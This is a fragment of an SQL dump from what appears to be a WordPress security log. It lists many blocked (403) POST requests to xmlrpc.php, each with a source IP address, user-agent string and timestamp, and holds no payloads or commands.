Safari\\/537.36\"}','RWZeNUdQbajigfVxM8lp5EP9',0,1681867183.2885,1431,'','POST',403,0,515,0,1,'',0),('199.249.230.27',3355043355,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dGE1gbsm86fLkQe3AnNcz7KC',0,1681871466.9744,4203,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','W0Gf9YTDQJ2EV1d8lHq4BZgP',0,1681871796.8192,5890,'','POST',403,0,515,0,1,'',0),('189.112.112.157',3178262685,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','tVlXMI2znCq3obpywDSxikcB',0,1681871804.5445,903,'','POST',403,0,515,0,1,'',0),('143.137.191.205',2408169421,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','FCTD46ilfmtoBSQdjVuJUg1p',0,1681871811.3772,3863,'','POST',403,0,515,0,1,'',0),('51.195.176.80',868462672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','3YkzM8FCbj9Ds5N7upOofewX',0,1681871816.9880,692,'','POST',403,0,515,0,1,'',0),('154.53.38.46',2587174446,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','JbX8Vh9cQdT0NfaLBtns1pS3',0,1681871820.7383,700,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','PehpdaVi6zqQJ91WS5Ngc0G2',0,1681871830.2622,649,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','n4JUy7fz2BjtqDZmPoA6YCEx',0,1681871833.2995,1499,'','POST',403,0,515,0,1,'',0),('38.242.129.230',653427174,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','bc4IWfVwEyzCSPeh1xgFHmGn',0,1681871836.8414,1231,'','POST',403,0,515,0,1,'',0),('188.68.47.117',3158585205,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','EFkh8XJmplYQOq0BavVKCS3c',0,1681873022.0028,4503,'','POST',403,0,515,0,1,'',0),('74.208.57.151',1255160215,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','wyUrH9gKVjXnDTJNdlGQRezF',0,1681873029.0226,594,'','POST',403,0,515,0,1,'',0),('161.97.86.172',2707510956,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','apYDUqzCiMyrsTZSIge6t3NX',0,1681873035.8467,573,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','wrHIQ7lOeSj4gRVfsikW0KT9',0,1681873046.5174,658,'','POST',403,0,515,0,1,'',0),('192.99.18.63',3227718207,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','qVvC8ZJXF46A0sOzI1imagER',0,1681873052.3342,686,'','POST',403,0,515,0,1,'',0),('97.74.86.129',1632261761,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','xG7goRHPXdQTyeUDcVkzZqip',0,1681873057.4996,661,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPod; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','Jq8FodxPWcishI4HLbV5Bzju',0,1681873058.1948,611,'','POST',403,0,515,0,1,'',0),('45.150.149.86',764843350,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','IhKo9BRQgSv8pDAUTVCNMkm0',0,1681873062.5173,604,'','POST',403,0,515,0,1,'',0),('139.59.25.27',2335906075,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','ZT7t0uFhoeAwB2nPmcg9JQGq',0,1681873065.4499,656,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','UtaCk9jrKM0niRGp6yNLwz3F',0,1681873070.6724,576,'','POST',403,0,515,0,1,'',0),('159.89.203.225',2673462241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','8ZKenmdNApDyIVvScB60fwux',0,1681875253.1671,2190,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','UgWTrAGBeVobJHPcLtaShDqO',0,1681875253.4690,1984,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','jx0NgRy7ZodvfYsMO5mU9SXn',0,1681875260.8582,590,'','POST',403,0,515,0,1,'',0),('158.220.97.94',2665242974,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','KVZCpdSNLDYwOvsxzM5ETaQo',0,1681875873.0081,1644,'','POST',403,0,515,0,1,'',0),('103.154.184.198',1738193094,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','CpUFBZxVG829JhQjrIyWc5aq',0,1681875871.0293,3634,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko\\/20100101 Firefox\\/79.0\"}','kqRZ5pMN9eY2n0aIsriFUK8T',0,1681875877.3349,598,'','POST',403,0,515,0,1,'',0),('170.10.162.9',2852823561,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko\\/20050915 Firefox\\/1.0.7\"}','3QRUGA7iJOfyv4zplh5exba8',0,1681875884.9482,585,'','POST',403,0,515,0,1,'',0),('104.236.7.86',1760298838,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','cOnXwWSopau5MPE0BIVxzsR9',0,1681875894.6180,1333,'','POST',403,0,515,0,1,'',0),('185.221.182.7',3118315015,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','f9CygrkU037JN48pTuOoHWIa',0,1681875901.0114,629,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','H7olpZOImCvS6xsfb1ywGXkN',0,1681875906.3240,658,'','POST',403,0,515,0,1,'',0),('103.184.97.242',1740136946,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','6G0TIUr1QLgd8M3lsehYvoky',0,1681875907.1414,713,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','lCjaWb30e1khPo6QrsEJp89D',0,1681879313.0051,562,'','POST',403,0,515,0,1,'',0),('148.72.232.65',2487806017,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','wgvRGVYybUmNxXOkarohqul4',0,1681879318.0334,871,'','POST',403,0,515,0,1,'',0),('146.70.76.35',2454080547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','TUwoR8aSyOHnkjeK36ltfNZY',0,1681879358.6278,608,'','POST',403,0,515,0,1,'',0),('213.152.162.104',3583550056,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','DqF4xP78ncsu0kZNzJbTAMi9',0,1681880100.0104,4599,'','POST',403,0,515,0,1,'',0),('68.178.225.144',1152573840,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','k3PsVCXocOmv8GiH12IDlMTn',0,1681880238.7990,3079,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','tf9JuDW3ksi2YC1ZnQxI0gpS',0,1681880241.5691,830,'','POST',403,0,515,0,1,'',0),('103.171.90.148',1739283092,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','Jcg8NjH97lFyp1TLtDSXZW6E',0,1681880250.6727,1896,'','POST',403,0,515,0,1,'',0),('194.163.34.111',3265471087,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','ymSn46uzKjPfYXME9cvOT2W7',0,1681880255.9383,625,'','POST',403,0,515,0,1,'',0),('81.169.144.135',1370067079,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','1eiCjA4blTnN7hKw6qVyrDJE',0,1681880265.1817,2468,'','POST',403,0,515,0,1,'',0),('43.153.21.232',731452904,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','EaVD9xyGgF7qvUPBf8lMp1NW',0,1681880268.0526,1594,'','POST',403,0,515,0,1,'',0),('49.50.84.123',825382011,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','K9Us4OhBJvNnAT1wGmLIC5aY',0,1681880268.3650,1381,'','POST',403,0,515,0,1,'',0),('37.139.20.103',629871719,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','KQjHROwIYDSWNz04bUZxudi1',0,1681880275.5141,689,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','NS3mp0Djd8xqUgWR9BZnrP2u',0,1681880282.7853,739,'','POST',403,0,515,0,1,'',0),('91.134.248.249',1535572217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','PUSWBYKuJshZ70vQwRe6jFxn',0,1681880284.8269,585,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','6QJeWkwKB7MOnhyqTGDmS8jt',0,1681883525.7261,2329,'','POST',403,0,515,0,1,'',0),('161.97.120.186',2707519674,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','jXra82MKIhUiqFvPZld9pb5B',0,1681883533.3727,588,'','POST',403,0,515,0,1,'',0),('201.249.57.131',3388553603,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','0zYSVhK5nf8WFvJirGImeQ76',0,1681883544.5406,639,'','POST',403,0,515,0,1,'',0),('173.82.231.116',2907891572,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','E8dQZXoVHfa0cN3gAJSU7nR2',0,1681883545.4764,570,'','POST',403,0,515,0,1,'',0),('82.165.86.47',1386567215,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','P0GJuTdzaDojHUiVfm3YLNMw',0,1681883549.3281,687,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','xrukcsSvCoXzL3QHRT8wni0I',0,1681883580.5824,572,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','8iymPIJcCH5fAlpLwEuz2NSY',0,1681883583.4364,598,'','POST',403,0,515,0,1,'',0),('92.205.2.206',1556939470,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','CBlFDa1f8weHrAhjUcvxbWVQ',0,1681883585.3190,569,'','POST',403,0,515,0,1,'',0),('141.98.18.59',2372014651,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','msUSuXeRQqhdr5jyxoPDBvKF',0,1681883600.8212,691,'','POST',403,0,515,0,1,'',0),('89.201.167.100',1506387812,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','aFIKknpCobxYLX0GDqeJyO9A',0,1681883602.9662,645,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','D6N5TsM2mRhnaGLXlAqkvu78',0,1681883610.3767,583,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','hMQT7u2xp9BYiq1yX38OA4wj',0,1681883622.5599,694,'','POST',403,0,515,0,1,'',0),('51.91.29.218',861609434,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-Q720) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','C0zlmSwpNGU2xbd7vyRHPLFV',0,1681883623.2719,594,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','QYqXCEsdGBSuMFkV4jOZWKnc',0,1681883626.5498,663,'','POST',403,0,515,0,1,'',0),('213.152.162.154',3583550106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','ZiJ2A6cNLuzW50KbyDXfxUEI',0,1681885411.8006,6345,'','POST',403,0,515,0,1,'',0),('178.162.209.171',2997014955,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VpjLlnPFySsCGhZ4JbrwAI8u',0,1681886088.9774,4143,'','POST',403,0,515,0,1,'',0),('141.98.18.59',2372014651,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','IgY058UB2HwzsviaFWo3XAPj',0,1681888663.8275,4499,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','80dRunDjr2GL54koI7STNmb3',0,1681888666.8901,1437,'','POST',403,0,515,0,1,'',0),('75.119.135.6',1266124550,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','d6JP8WzeqQ4Z1YTpiuA5Sy2C',0,1681888711.0979,595,'','POST',403,0,515,0,1,'',0),('86.105.9.67',1449724227,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Hp4uUcn0yBCT8LZ3K1ktRgzQ',0,1681889681.3278,4064,'','POST',403,0,515,0,1,'',0),('107.167.244.83',1806169171,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0C51y9hniGrtB6oc8ePNFmp7',0,1681890737.9265,4179,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0B2yovFq69xWgiNajV5XkCph',0,1681890795.6684,1020,'','POST',403,0,515,0,1,'',0),('91.214.169.69',1540794693,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rD5gu9F78wIVAJxbSy3psUPB',0,1681890939.8884,3788,'','POST',403,0,515,0,1,'',0),('172.105.163.59',2892604219,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','bTaDvMxFkWyl32Zo51z6uEpr',0,1681891463.4308,2827,'','POST',403,0,515,0,1,'',0),('149.102.138.19',2506525203,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','VoGWuvPRM26TO9U5wh7SAcfL',0,1681891463.7029,2559,'','POST',403,0,515,0,1,'',0),('195.158.25.14',3281918222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','OAWup9Z5m0zBMixFb4hoQgKP',0,1681891466.7269,1857,'','POST',403,0,515,0,1,'',0),('149.129.227.62',2508317502,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','OqGinvLj13ReTcdx8XgkEMNm',0,1681891469.0705,1113,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','V24X9lzPwnvgQ7LjxaMStB0b',0,1681892199.2774,4039,'','POST',403,0,515,0,1,'',0),('65.109.24.229',1097668837,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko\\/20100101 Firefox\\/67.0\"}','gUF5Wvyer3pJHicRD6f02xZa',0,1681892202.0819,1393,'','POST',403,0,515,0,1,'',0),('149.129.105.145',2508286353,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','Osxy10eSlXqP2Chcp9ZtFIE5',0,1681892204.4343,611,'','POST',403,0,515,0,1,'',0),('109.234.164.49',1844094001,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','nK50xGcf9ekQO6ArBIpTdPJ2',0,1681892207.6455,646,'','POST',403,0,515,0,1,'',0),('192.64.117.87',3225449815,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','fi1rIFNVpYo3KjHDXz5U9B0v',0,1681892214.9123,640,'','POST',403,0,515,0,1,'',0),('38.242.129.230',653427174,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','16sGC3QZIFlg45AWkbeUREhO',0,1681892221.5705,600,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','IV0qPotvzdQFSTEAfcLsgb3a',0,1681892227.0852,555,'','POST',403,0,515,0,1,'',0),('41.193.5.58',700515642,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','Vs1GLQgwnO7uhHDdj3SecaMK',0,1681895005.3560,707,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','SnDJovWMx5TCZPYFKXizA2RV',0,1681895009.3357,604,'','POST',403,0,515,0,1,'',0),('43.155.103.11',731604747,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','kOwXD2PQSWfamEr0j3de7los',0,1681898056.3791,3782,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','IBmWUZ91nSAi7svqyVKoF64z',0,1681898069.3004,608,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 